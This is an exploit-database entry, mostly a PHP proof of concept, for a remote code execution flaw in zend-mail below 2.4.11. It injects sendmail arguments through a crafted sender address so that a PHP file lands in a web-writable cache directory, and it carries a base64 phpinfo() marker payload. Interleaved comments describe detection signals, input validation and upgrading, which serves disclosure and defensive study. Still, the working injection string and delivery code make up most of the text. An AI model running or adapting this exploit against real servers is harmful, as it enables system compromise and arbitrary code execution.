Zend Framework / zend-mail < 2.4.11 - Remote Code Execution

Свойства

Дата публикации:
09.01.2017
Цель:
Zend Framework / zend-mail < 2.4.11
Тип воздействия:
Компрометация системы

Код


09607 <<< 
09607 <<< 
09607 <<< 
  
  
/*
See the full advisory URL for the exploit details.
*/
  
  
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
//
// Both values below are hard-coded stand-ins for request data so the
// vulnerable code path can be reproduced in a test environment.
//
// Root cause on the application side: a user-supplied sender address is
// accepted without strict syntax validation. The quoted local part below
// closes its quote early with an escaped quote and then carries tokens that
// look like sendmail command-line options (-oQ..., -X...).
//
// Defensive signal: a sender value containing whitespace, a backslash-escaped
// quote, or a token beginning with '-' should be rejected at the input
// boundary, and is worth alerting on in contact-form and web-server logs.
  
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
// Harmless marker payload: it only proves that message content can end up
// somewhere it is interpreted as PHP. An unexpected .php file appearing in a
// web-writable cache directory is the artefact to look for in file-integrity
// monitoring.
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");
 
 
 
// ------------------
  
// mail() param injection via the vulnerability in zend-mail
 
 
// Framework bootstrap only; nothing in this run of statements is part of the
// flaw. It makes the Zend\Mail classes loadable.
// Work from the parent of this script's directory so the relative paths
// below (vendor/..., config/...) resolve.
chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';
 
// Register the standard autoloader with the Zend Framework namespace enabled.
Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));
 
// NOTE(review): run() dispatches the MVC application before the mail code
// further down executes. Presumably this is here only to mirror a real
// application's bootstrap; confirm it is needed for a reproduction.
Zend\Mvc\Application::init(require 'config/application.php')->run();
 
// Vulnerable usage pattern: an unvalidated, user-controlled address is set as
// the sender and the message is delivered through the Sendmail transport.
// The page title lists zend-mail releases below 2.4.11 as affected, so
// 2.4.11 or later is the minimum version to run.
$message        = new \Zend\Mail\Message();
 
$message->setBody($msg_body);
// This is the untrusted value. Defence in depth beyond upgrading: validate it
// against a strict address grammar before this call, or keep From fixed to an
// application-owned address and put the visitor's address in Reply-To.
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');
 
// The Sendmail transport delivers through PHP's mail(). Per the page's own
// description ("mail() param injection"), sender-derived data reaches the
// additional parameters passed to the local sendmail binary.
// Where a local binary is not required, an SMTP transport
// (\Zend\Mail\Transport\Smtp) avoids building a command line at all.
$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);
 
?>